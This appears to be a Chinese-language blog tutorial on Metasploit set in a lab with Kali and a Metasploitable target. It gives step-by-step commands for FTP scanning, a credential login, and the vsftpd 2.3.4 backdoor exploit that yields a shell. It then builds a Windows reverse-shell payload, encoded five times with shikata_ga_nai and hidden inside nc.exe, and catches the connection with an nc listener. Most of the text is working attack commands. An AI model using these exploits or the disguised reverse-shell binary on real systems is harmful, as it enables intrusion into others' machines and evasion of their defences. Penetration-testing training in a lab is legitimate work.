1、Active exploit (主动)
触发方式:攻击者发起攻击并且发动payload执行,得到shell(即主动提交漏洞利用代码,从而达到利用漏洞)
2、Passive Exploits (被动)
触发方式:诸如客户端访问服务器,当服务器存在漏洞利用代码,而客户端有漏洞,客户端访问服务器被服务器的利用代码攻击,从而造成客户端shell给服务器 。典型的就是社会攻击。
注意:不管什么方法,都是加载payload使攻击效果达到
实战用到的工具:kali、metasploitable靶机、
使用的命令:
- - search ftp
- - use auxiliary/scanner/ftp/ftp_version
- set RHOSTS 172.20.10.13
- run
- - use auxiliary/scanner/ftp/anonymous
- set RHOSTS 172.20.10.13
- run
- - use auxiliary/scanner/ftp/ftp_login
- set RHOSTS 172.20.10.13
- set USERNAME msfadmin
- set PASSWORD msfadmin
- run
- - search 234
- 注意这里的234是ftp_version扫描出来的版本号
- -use exploit/unix/ftp/vsftpd_234_backdoor
- set RHOSTS 172.20.10.13
- run
- - uname -a
效果图如下:
上面便可。
用到的tool:kali、xp
使用到的命令:
- - show payload
- - use payload/windows/shell_reverse_tcp
- set LHOST 172.20.10.11
- -generate -h
- -generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/ share/windows-binaries/nc.exe -o /root/nc.exe 这里的意思是:去掉payload的坏字符指定为exe格式,然后进行5次加密,指定成注入方式并且注入到一个nc程序中,最后将生成结果导出到/root/nc.exe这个里面。
效果图:
将生成的可执行程序拷贝到xp中:
在本机端建立侦听程序:
nc -nvlp 4444
一旦xp中执行nc程序,那么侦听在本机的侦听端口将得到xp反弹回客户端的shell,取得对方shell执行操作。
注意:一旦当可执行程序在xp端被关闭,那么本地shell也将结束。
网站声明:如果转载,请联系本站管理员。否则一切后果自行承担。
加入交流群
请使用微信扫一扫!